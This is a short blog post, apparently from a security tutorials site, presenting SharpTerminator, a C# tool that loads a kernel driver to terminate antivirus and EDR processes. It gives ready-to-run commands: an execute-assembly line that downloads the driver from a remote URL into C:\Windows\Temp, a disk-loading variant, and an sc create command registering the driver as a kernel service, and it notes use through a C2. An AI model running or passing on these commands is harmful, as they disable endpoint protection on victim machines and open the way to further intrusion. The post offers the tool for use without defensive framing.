Hacking Tools

SharpTerminator – A Guide To Automating AV/EDR Disruption With C# Port

C# port of ZeroMemoryEx’s Terminator, so all hail goes to him.

Usage

You can download the driver from a remote URL using SharpTerminator and load it to terminate AV/EDR processes, or you can directly load it to the disk to perform the same operation.

When using Remote URL, the driver is downloaded to “C:\Windows\Temp” and then loaded from there.

In fact, there is no difference between them; if you don’t want to use the upload function in your C2, you can use the other one.

Loading from remote url:

execute-assembly SharpTerminator.exe --url "http://remoteurl.com:80/Terminator.sys"

Loading from disk:

execute-assembly SharpTerminator.exe --disk "C:\path\to\driver\Terminator.sys"

Known Issue

If you get “Failed to register the process in the trusted list!” error you should add service manually:

sc create Terminator binPath= "C:\path\to\driver.sys" type= kernel start= demand
Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Recent Posts

Operation Archive – Documenting The Dark Web’s Takedown

This repository will be used to add documents, pictures, etc on LEA efforts; Indictments, Seizure…

9 hours ago

Java Deserialization Cheat Sheet – Detecting And Exploiting Vulnerabilities

A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization…

9 hours ago

RedELK – Enhancing Red Team Operations And Blue Team Detection Through Centralized SIEM

Short: a Red Team's SIEM. Longer: a Red Team's SIEM that serves two main goals:…

1 day ago

RedELK Server – DeploymentEssential Configuration Variables Overview

We delve into the process of setting up a RedELK server, focusing on the critical…

1 day ago

RedELK-Client : Deploying Cybersecurity Monitoring With Ansible

The RedELK client components using Ansible, a powerful automation tool that streamlines the installation and…

1 day ago

Crawl4AI – The Future Of Asynchronous Web Crawling For AI

Crawl4AI simplifies asynchronous web crawling and data extraction, making it accessible for large language models…

1 day ago